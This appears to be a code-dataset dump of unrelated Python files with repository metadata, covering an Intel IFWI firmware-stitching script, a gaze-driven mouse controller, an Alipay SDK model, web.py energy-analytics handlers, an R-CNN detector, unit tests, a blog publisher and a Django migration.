        comp = IFWI_PARSER.locate_component (root, dir_path)
        if not comp:
            continue
        for each in comp.child:
            if each.name.endswith('.man') or each.name.endswith('.met'):
                continue
            ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data)
            if ret != 0:
                raise Exception ('REMOVE failed (error code %d) !' % (ret))
    # Copy BP0 BPDT into BP1 BPDT for a redundant flash layout.
    if not non_redundant:
        ret = manipulate_ifwi ('COPY', '', ifwi_data)
        if ret != 0:
            raise Exception ('COPY failed (error code %d) !' % (ret))
    if stitch_dir:
        # (component name in BPDT, Stitch_<name>.bin file) pairs.
        ibb_list = [
          ('IBBL' , 'IBBL'),
          ('IBB'  , 'IBBM'),
          ('OBB'  , 'OBB'),
          ('FWUP' , 'FWU'),
          ('CFGD' , 'CFGDATA'),
          ('KEYH' , 'KEYHASH'),
          ('VAR'  , 'VAR'),
          ('MRCD' , 'MRCDATA'),
          ('PLD'  , 'PLD'),
          ]
        obb_list = [
          ('FB'   , 'FB'),
          ('EPLD' , 'EPLD'),
          ('UVAR' , 'UVAR'),
          ('PLD'  , 'PLD'),
          ]
        # optional components
        opt_list = [
          'EPLD', 'UVAR'
          ]
        # The payload goes either into each BPDT (redundant) or once into
        # BP1's SBPDT OBB (non-redundant payload).
        if redundant_payload:
            del obb_list[-1]
        else:
            del ibb_list[-1]
        bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/"
        loop = 1 if non_redundant else 2
        for bp in range(loop):
            dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp
            for comp_name, file_name in ibb_list:
                file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
                ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path)
                if ret != 0:
                    raise Exception ('ADD failed (error code %d) !' % (ret))
        for comp_name, file_name in obb_list:
            if file_name == '':
                file_path = ''
            else:
                file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
            if (comp_name in opt_list) and not os.path.exists(file_path):
                # Optional component without a stitched file: skip silently.
                ret = 0
            else:
                ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path)
            if ret != 0:
                raise Exception ('ADD failed (error code %d) !' % (ret))
        patch_flash_map (ifwi_data, platform_data)
    if bios_out:
        print ('Creating BIOS image ...')
        bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS')
        fd = open (bios_out, 'wb')
        fd.write(ifwi_data[bios.offset:bios.offset+bios.length])
        fd.close()
    print ('Creating IFWI image ...')
    fd = open (ifwi_out, 'wb')
    fd.write(ifwi_data)
    fd.close()
    print ('Done!')
def print_ifwi_layout (ifwi_file):
    """Dump the component tree of *ifwi_file* to stdout.

    Reports 'Invalid IFWI image' when parsing fails; always returns 0.
    """
    parser = IFWI_PARSER()
    image = bytearray(get_file_data(ifwi_file))
    root = parser.parse_ifwi_binary(image)
    if root:
        parser.print_tree(root)
    else:
        print('Invalid IFWI image')
    return 0
if __name__ == '__main__':
    # Parse hexadecimal command-line values such as 0x12345678.
    hexstr = lambda x: int(x, 16)
    ap = argparse.ArgumentParser()
    ap.add_argument('-i',
                    '--input-ifwi-file',
                    dest='ifwi_in',
                    type=str,
                    required=True,
                    help='specify input template IFWI image file path')
    ap.add_argument('-o',
                    '--output-ifwi-file',
                    dest='ifwi_out',
                    type=str,
                    default='',
                    help='specify generated output IFWI image file path')
    ap.add_argument('-b',
                    '--output-bios-region',
                    dest='bios_out',
                    type=str,
                    default='',
                    help='specify generated output BIOS region image file path')
    ap.add_argument('-s',
                    '--sitch-zip-file',
                    dest='stitch_in',
                    type=str,
                    default='',
                    help='specify input sitching zip package file path')
    ap.add_argument('-p',
                    '--platform-data',
                    dest='plat_data',
                    type=hexstr,
                    default=0xFFFFFFFF,
                    help='specify a platform specific data (HEX, DWORD) for customization')
    ap.add_argument('-n',
                    '--non-redundant',
                    dest='non_redundant',
                    action="store_true",
                    help='specify if the flash layout will be full redundant or not')
    # Show extended usage before argparse errors out on the missing '-i'.
    if len(sys.argv) == 1:
        print('%s' % extra_usage_txt)
    args = ap.parse_args()
    if args.ifwi_out == '' and args.stitch_in == '':
        # View-only mode: dump the layout of the input image.
        print_ifwi_layout (args.ifwi_in)
        sys.exit (0)
    else:
        if args.ifwi_out and args.stitch_in == '':
            # No stitch package: regenerate the IFWI from the base image only.
            ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None)
            sys.exit (ret)
        # Unpack the stitching components next to the output image.
        print ("Unpacking sitching ZIP package ...")
        output_dir = os.path.dirname(args.ifwi_out)
        stitch_dir = os.path.join(output_dir, 'stitch_comp')
        if os.path.exists(stitch_dir):
            shutil.rmtree(stitch_dir)
        zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED)
        zf.extractall(stitch_dir)
        zf.close()
        # Create the new IFWI, then clean up the extracted files.
        ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir)
        if os.path.exists(stitch_dir):
            shutil.rmtree(stitch_dir)
        sys.exit (ret)
| true
| true
|
f705c96c12e4e0c7f7af29723e12d8fbcdab4c40
| 907
|
py
|
Python
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | 1
|
2020-09-04T06:28:43.000Z
|
2020-09-04T06:28:43.000Z
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | 1
|
2022-01-13T02:59:41.000Z
|
2022-01-13T02:59:41.000Z
|
src/mouse_controller.py
|
NAITTOU/computer_pointer_controller
|
b36ce51e7638543b54da1abe56f7ae54eb21918f
|
[
"MIT"
] | null | null | null |
'''
This is a sample class that you can use to control the mouse pointer.
It uses the pyautogui library. You can set the precision for mouse movement
(how much the mouse moves) and the speed (how fast it moves) by changing
precision_dict and speed_dict.
Calling the move function with the x and y output of the gaze estimation model
will move the pointer.
This class is provided to help get you started; you can choose whether you want to use it or create your own from scratch.
'''
import pyautogui
pyautogui.FAILSAFE = False
class MouseController:
    """Move the OS mouse pointer from gaze-estimation (x, y) output.

    *precision* scales the normalized gaze vector into pixels; *speed* is
    the pyautogui movement duration in seconds.
    """

    # Config-string -> numeric value lookup tables.
    _PRECISIONS = {'high': 100, 'low': 1000, 'medium': 500}
    _SPEEDS = {'fast': 1, 'slow': 10, 'medium': 5}

    def __init__(self, precision, speed):
        self.precision = self._PRECISIONS[precision]
        self.speed = self._SPEEDS[speed]

    def move(self, x, y):
        """Move the pointer relatively; screen y grows downward, hence -y."""
        dx = x * self.precision
        dy = -1 * y * self.precision
        pyautogui.moveRel(dx, dy, duration=self.speed)
| 43.190476
| 122
| 0.732084
|
import pyautogui
pyautogui.FAILSAFE = False
class MouseController:
    """Translate gaze-estimation (x, y) output into pointer movement."""

    def __init__(self, precision, speed):
        """Map the 'high'/'low'/'medium' and 'fast'/'slow'/'medium' config
        strings to a pixel multiplier and a movement duration (seconds)."""
        precision_by_name = {'high': 100, 'low': 1000, 'medium': 500}
        speed_by_name = {'fast': 1, 'slow': 10, 'medium': 5}
        self.precision = precision_by_name[precision]
        self.speed = speed_by_name[speed]

    def move(self, x, y):
        """Relative move; y is negated because screen y grows downward."""
        pyautogui.moveRel(x * self.precision,
                          -1 * y * self.precision,
                          duration=self.speed)
| true
| true
|
f705c9972c508fc15446070fc555ad919151b644
| 1,253
|
py
|
Python
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/domain/AntOcrVehicleplateIdentifyModel.py
|
alipay/alipay-sdk-python-all
|
1b63620431d982d30d39ee0adc4b92463cbcee3c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AntOcrVehicleplateIdentifyModel(object):
    """Request model for the Ant OCR vehicle-plate identification API.

    Carries two optional fields, ``image`` and ``type``, and converts
    to/from the dict shape expected by the Alipay gateway.
    """

    def __init__(self):
        # Backing storage for the two public properties.
        self._image = None
        self._type = None

    @property
    def image(self):
        """Image payload to run plate recognition on."""
        return self._image

    @image.setter
    def image(self, value):
        self._image = value

    @property
    def type(self):
        """Recognition type selector."""
        return self._type

    @type.setter
    def type(self, value):
        self._type = value

    def to_alipay_dict(self):
        """Serialize to a plain dict, omitting unset (falsy) fields."""
        params = {}
        for key in ('image', 'type'):
            value = getattr(self, key)
            if not value:
                continue
            # Nested API models expose to_alipay_dict(); plain values pass through.
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[key] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an instance from a gateway dict; None for empty input."""
        if not d:
            return None
        o = AntOcrVehicleplateIdentifyModel()
        if 'image' in d:
            o.image = d['image']
        if 'type' in d:
            o.type = d['type']
        return o
| 22.375
| 61
| 0.545092
|
import json
from alipay.aop.api.constant.ParamConstants import *
class AntOcrVehicleplateIdentifyModel(object):
    """Vehicle-plate OCR request model with optional ``image``/``type`` fields."""

    def __init__(self):
        self._image = None
        self._type = None

    @property
    def image(self):
        return self._image

    @image.setter
    def image(self, value):
        self._image = value

    @property
    def type(self):
        return self._type

    @type.setter
    def type(self, value):
        self._type = value

    @staticmethod
    def _serialize(value):
        # Nested API models expose to_alipay_dict(); plain values pass through.
        return value.to_alipay_dict() if hasattr(value, 'to_alipay_dict') else value

    def to_alipay_dict(self):
        """Return the request as a dict, skipping unset (falsy) fields."""
        params = dict()
        if self.image:
            params['image'] = self._serialize(self.image)
        if self.type:
            params['type'] = self._serialize(self.type)
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Inverse of to_alipay_dict(); returns None for a falsy input."""
        if not d:
            return None
        o = AntOcrVehicleplateIdentifyModel()
        if 'image' in d:
            o.image = d['image']
        if 'type' in d:
            o.type = d['type']
        return o
| true
| true
|
f705ca0b99c4431c3fdc996319aa370d49c274ac
| 1,827
|
py
|
Python
|
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
import json
import web
import calendar
import datetime
import cloudserver
urls = (
"/BuildingFootprint/", "BuildingFootprint",
"/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated",
"/PersonalConsumption/", "PersonalConsumption",
"/HistoricalConsumption/", "HistoricalConsumption")
class BuildingFootprint:
    """web.py handler: building-wide footprint over a [start, end] window.

    Query params 'start'/'end' are Unix timestamps; defaults are the last
    24 hours ending now (UTC).
    """

    def GET(self):
        params = web.input()
        if "end" in params:
            end = float(params['end'])
        else:
            end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        if "start" in params:
            start = float(params['start'])
        else:
            # Default window: the 24 hours leading up to now.
            start = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) - 24 * 60 * 60
        return cloudserver.db.buildingFootprint(start, end)
class BuildingFootprintDisaggregated:
    """web.py handler: per-source (disaggregated) building footprint.

    Same 'start'/'end' query parameters and defaults as BuildingFootprint.
    """

    def GET(self):
        params = web.input()
        if "end" in params:
            end = float(params['end'])
        else:
            end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        if "start" in params:
            start = float(params['start'])
        else:
            # Default window: the 24 hours leading up to now.
            start = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) - 24 * 60 * 60
        return cloudserver.db.buildingFootprintDisaggregated(start, end)
class PersonalConsumption:
    """web.py handler: a single user's footprint over a [start, end] window.

    Query params: 'start'/'end' Unix timestamps (default: last 24 hours)
    and 'user' (default: "Peter Wei").
    """

    def GET(self):
        print("Got to Personal Consumption")
        params = web.input()
        now = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        end = float(params['end']) if "end" in params else now
        start = float(params['start']) if "start" in params else now - 24 * 60 * 60
        user = params['user'] if "user" in params else "Peter Wei"
        return cloudserver.db.personalFootprint(user, start, end)
class HistoricalConsumption:
    # web.py handler: return the full historical consumption data set.
    def GET(self):
        return cloudserver.db.historicalConsumption()
dataExtraction = web.application(urls, locals())
| 26.478261
| 85
| 0.727422
|
import json
import web
import calendar
import datetime
import cloudserver
urls = (
"/BuildingFootprint/", "BuildingFootprint",
"/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated",
"/PersonalConsumption/", "PersonalConsumption",
"/HistoricalConsumption/", "HistoricalConsumption")
class BuildingFootprint:
    """web.py handler: building footprint between 'start' and 'end' (Unix
    timestamps from the query string; default is the last 24 hours, UTC)."""

    def GET(self):
        raw = web.input()
        now = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        end = float(raw['end']) if "end" in raw else now
        # Default start: 24 hours before now.
        start = float(raw['start']) if "start" in raw else now - 24 * 60 * 60
        return cloudserver.db.buildingFootprint(start, end)
class BuildingFootprintDisaggregated:
    """web.py handler: disaggregated building footprint; same parameters
    and defaults as BuildingFootprint."""

    def GET(self):
        raw = web.input()
        now = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        end = float(raw['end']) if "end" in raw else now
        # Default start: 24 hours before now.
        start = float(raw['start']) if "start" in raw else now - 24 * 60 * 60
        return cloudserver.db.buildingFootprintDisaggregated(start, end)
class PersonalConsumption:
    """web.py handler: one user's footprint; 'user' query param defaults
    to "Peter Wei", window defaults to the last 24 hours (UTC)."""

    def GET(self):
        print("Got to Personal Consumption")
        raw = web.input()
        end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
        if "end" in raw:
            end = float(raw['end'])
        start = calendar.timegm(datetime.datetime.utcnow().utctimetuple()) - 24 * 60 * 60
        if "start" in raw:
            start = float(raw['start'])
        user = raw.get('user', "Peter Wei") if hasattr(raw, 'get') else "Peter Wei"
        if "user" in raw:
            user = raw['user']
        return cloudserver.db.personalFootprint(user, start, end)
class HistoricalConsumption:
    # web.py handler: return the full historical consumption data set.
    def GET(self):
        return cloudserver.db.historicalConsumption()
dataExtraction = web.application(urls, locals())
| true
| true
|
f705ca2749b113501167b31f27c6bb73734fd6c0
| 2,235
|
py
|
Python
|
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""
Implements the Generalized R-CNN framework
"""
import torch
from torch import nn
from openpose.structures.image_list import to_image_list
from ..backbone import build_backbone
from ..rpn.rpn import build_rpn
from ..roi_heads.roi_heads import build_roi_heads
class GeneralizedRCNN(nn.Module):
    """
    Main class for Generalized R-CNN. Currently supports boxes and masks.
    It consists of three main parts:
    - backbone
    - rpn
    - heads: takes the features + the proposals from the RPN and computes
        detections / masks from it.
    """
    def __init__(self, cfg):
        super(GeneralizedRCNN, self).__init__()
        # Sub-modules are built from the config; RPN and ROI heads consume
        # the backbone's output channel count.
        self.backbone = build_backbone(cfg)
        self.rpn = build_rpn(cfg, self.backbone.out_channels)
        self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels)
    def forward(self, images, targets=None):
        """
        Arguments:
            images (list[Tensor] or ImageList): images to be processed
            targets (list[BoxList]): ground-truth boxes present in the image (optional)
        Returns:
            result (list[BoxList] or dict[Tensor]): the output from the model.
                During training, it returns a (losses dict, detections) tuple.
                During testing, it returns list[BoxList] contains additional fields
                like `scores`, `labels` and `mask` (for Mask R-CNN models).
        """
        if self.training and targets is None:
            raise ValueError("In training mode, targets should be passed")
        images = to_image_list(images)
        features = self.backbone(images.tensors)
        proposals, proposal_losses = self.rpn(images, features, targets)
        if self.roi_heads:
            x, result, detector_losses = self.roi_heads(features, proposals, targets)
        else:
            # RPN-only models don't have roi_heads
            x = features
            result = proposals
            detector_losses = {}
        if self.training:
            # Merge RPN and detector losses into one dict; note this returns
            # a (losses, result) tuple, unlike the losses-only upstream API.
            losses = {}
            losses.update(detector_losses)
            losses.update(proposal_losses)
            return losses,result
        return result
| 34.384615
| 87
| 0.644295
|
import torch
from torch import nn
from openpose.structures.image_list import to_image_list
from ..backbone import build_backbone
from ..rpn.rpn import build_rpn
from ..roi_heads.roi_heads import build_roi_heads
class GeneralizedRCNN(nn.Module):
def __init__(self, cfg):
super(GeneralizedRCNN, self).__init__()
self.backbone = build_backbone(cfg)
self.rpn = build_rpn(cfg, self.backbone.out_channels)
self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels)
def forward(self, images, targets=None):
if self.training and targets is None:
raise ValueError("In training mode, targets should be passed")
images = to_image_list(images)
features = self.backbone(images.tensors)
proposals, proposal_losses = self.rpn(images, features, targets)
if self.roi_heads:
x, result, detector_losses = self.roi_heads(features, proposals, targets)
else:
x = features
result = proposals
detector_losses = {}
if self.training:
losses = {}
losses.update(detector_losses)
losses.update(proposal_losses)
return losses,result
return result
| true
| true
|
f705cb12d2f7098d80c81f26b124cf8f7a03cf9a
| 1,441
|
py
|
Python
|
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | 16
|
2021-01-06T17:44:51.000Z
|
2022-01-06T12:07:07.000Z
|
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | null | null | null |
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | 4
|
2021-03-25T20:35:08.000Z
|
2021-09-06T13:10:58.000Z
|
"""Test DeltaPySimulator functionality pre-execution."""
import unittest
import deltalanguage as dl
from deltalanguage.test._graph_lib import (getg_const_chain,
getg_optional_queues)
class DeltaQueueCreationTest(unittest.TestCase):
    """Checks on the queues DeltaPySimulator wires between graph nodes."""

    def test_queue_types(self):
        """Constant-node outputs get a ConstQueue; ordinary nodes a DeltaQueue.

        Also checks that nodes with no consumers get no out queues at all.
        """
        g = getg_const_chain()
        dl.DeltaPySimulator(g)

        self.assertEqual(len(g.nodes[0].out_queues), 0)
        self.assertEqual(len(g.nodes[1].out_queues), 1)
        self.assertEqual(len(g.nodes[2].out_queues), 1)
        self.assertEqual(type(g.nodes[1].out_queues['output']),
                         dl.runtime.ConstQueue)
        self.assertEqual(type(g.nodes[2].out_queues['output']),
                         dl.runtime.DeltaQueue)

    def test_queue_optionality(self):
        """Queue optionality mirrors the optionality of the destination input."""
        g = getg_optional_queues()
        dl.DeltaPySimulator(g)

        self.assertEqual(g.nodes[0].out_queues['output'].optional, True)
        self.assertEqual(g.nodes[1].out_queues['output'].optional, False)
if __name__ == "__main__":
    # Allow running this test module directly: `python test_runtime.py`.
    unittest.main()
| 33.511628
| 79
| 0.651631
|
import unittest
import deltalanguage as dl
from deltalanguage.test._graph_lib import (getg_const_chain,
getg_optional_queues)
class DeltaQueueCreationTest(unittest.TestCase):
def test_queue_types(self):
graph = getg_const_chain()
dl.DeltaPySimulator(graph)
self.assertEqual(len(graph.nodes[0].out_queues), 0)
self.assertEqual(len(graph.nodes[1].out_queues), 1)
self.assertEqual(len(graph.nodes[2].out_queues), 1)
self.assertEqual(type(graph.nodes[1].out_queues['output']),
dl.runtime.ConstQueue)
self.assertEqual(type(graph.nodes[2].out_queues['output']),
dl.runtime.DeltaQueue)
def test_queue_optionality(self):
graph = getg_optional_queues()
dl.DeltaPySimulator(graph)
self.assertEqual(graph.nodes[0].out_queues['output'].optional, True)
self.assertEqual(graph.nodes[1].out_queues['output'].optional, False)
if __name__ == "__main__":
unittest.main()
| true
| true
|
f705ceaa19f72aa3d963f72c85586a1a32e6de9b
| 101
|
py
|
Python
|
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
# Application entry point: build the Flask app via the factory and serve it.
from website import create_app

app = create_app()

if __name__ == '__main__':
    # Debug mode enables the reloader and interactive tracebacks; dev only.
    app.run(debug=True)
| 14.428571
| 30
| 0.722772
|
from website import create_app
app = create_app()
if __name__== '__main__':
app.run(debug=True)
| true
| true
|
f705cf0495bceae4e5ea4f4df95a6ec02a280af1
| 3,195
|
py
|
Python
|
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | null | null | null |
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | 1
|
2022-01-29T08:28:36.000Z
|
2022-01-29T08:28:36.000Z
|
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | null | null | null |
from typing import List
from blogs.api.interface import IBlogApiExecutor
from domain.blog.blog_entry import BlogEntry, BlogEntries
from domain.doc.doc_entry import DocEntries, DocEntry
from dump.blog_to_doc_mapping import BlogDocEntryMapping
from dump.interface import IDumpEntriesAccessor
from files.conf.category_group_def import CategoryGroupDef
from service.external.blog_entry_index_updater import update_blog_entry_summary_file
from service.external.blog_entry_pusher import push_blog_and_photo_entry
from service.local.doc_entry_pusher import push_documents_to_docs
def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor,
                                dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
                                dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
                                category_group_def: CategoryGroupDef, is_draft: bool,
                                target_dir_names: List[str] = None):
    """Dump local documents into docs, then publish the dumped entries to the blog.

    target_dir_names limits the dump to specific directories; None means all.
    """
    dumped = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names)
    if dumped is None:
        # Nothing was dumped, so there is nothing to publish.
        return
    __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def,
                                   dumped, is_draft)
def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
                                 dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
                                 dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
                                 category_group_def: CategoryGroupDef,
                                 target_doc_entry_ids: List[str], is_draft: bool):
    """Publish already-dumped doc entries (selected by id) to the blog."""
    # Resolve the target ids to their dumped doc entries, then delegate.
    entries_to_push: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids)
    __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def,
                                   entries_to_push, is_draft)
def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
                                   dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
                                   category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool):
    """Push each doc entry to the blog, then persist dumps, mapping and summary.

    Entries whose push is skipped (push_blog_and_photo_entry returns None) are
    logged and excluded from the persisted results.
    """
    mapping = BlogDocEntryMapping()
    pushed_entries: List[BlogEntry] = []
    for doc in doc_entries.entry_list:
        # Reuse the previously pushed blog entry (if any) so pushes update
        # rather than duplicate.
        existing_blog_id = mapping.get_blog_entry_id(doc.id)
        previous_entry = dump_blog_data_accessor.load_entry(existing_blog_id) \
            if existing_blog_id is not None else None
        pushed = push_blog_and_photo_entry(api_executor, doc, is_draft, previous_entry)
        if pushed is None:
            print(f'[Info] blog push skip. (dir: {doc.dir_path})')
            continue
        pushed_entries.append(pushed)
        mapping.push_entry_pair(pushed.id, doc.id)
    # dump to file
    updated = BlogEntries(pushed_entries)
    dump_blog_data_accessor.save_entries(updated)
    mapping.dump_file()
    update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated)
| 59.166667
| 116
| 0.746166
|
from typing import List
from blogs.api.interface import IBlogApiExecutor
from domain.blog.blog_entry import BlogEntry, BlogEntries
from domain.doc.doc_entry import DocEntries, DocEntry
from dump.blog_to_doc_mapping import BlogDocEntryMapping
from dump.interface import IDumpEntriesAccessor
from files.conf.category_group_def import CategoryGroupDef
from service.external.blog_entry_index_updater import update_blog_entry_summary_file
from service.external.blog_entry_pusher import push_blog_and_photo_entry
from service.local.doc_entry_pusher import push_documents_to_docs
def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef, is_draft: bool,
target_dir_names: List[str] = None):
doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names)
if doc_entries is None:
return
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef,
target_doc_entry_ids: List[str], is_draft: bool):
doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids)
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool):
blog_doc_mapping = BlogDocEntryMapping()
updated_blog_entry_list: List[BlogEntry] = []
for doc_entry in doc_entries.entry_list:
blog_entry_id_opt = blog_doc_mapping.get_blog_entry_id(doc_entry.id)
old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry(
blog_entry_id_opt)
new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt)
if new_blog_entry_opt is None:
print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})')
continue
updated_blog_entry_list.append(new_blog_entry_opt)
blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id)
updated_blog_entries = BlogEntries(updated_blog_entry_list)
dump_blog_data_accessor.save_entries(updated_blog_entries)
blog_doc_mapping.dump_file()
update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
| true
| true
|
f705d15166e8684268640b17b721182297f2ea28
| 330
|
py
|
Python
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 10
|
2015-05-28T18:26:40.000Z
|
2021-09-06T10:07:03.000Z
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 762
|
2015-01-15T10:00:59.000Z
|
2022-03-31T15:35:14.000Z
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 9
|
2015-02-20T13:19:30.000Z
|
2022-03-08T14:09:17.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-19 08:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated merge migration: unifies two parallel 0014 branches of the
    # 'cms' app into a single history. It intentionally performs no operations.

    dependencies = [
        ('cms', '0014_auto_20161216_1359'),
        ('cms', '0014_auto_20161216_1424'),
    ]

    operations = [
    ]
| 19.411765
| 48
| 0.654545
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20161216_1359'),
('cms', '0014_auto_20161216_1424'),
]
operations = [
]
| true
| true
|
f705d1668beb8e7029c97be27c6db88af67d97b3
| 4,213
|
py
|
Python
|
planemo/galaxy/api.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | null | null | null |
planemo/galaxy/api.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
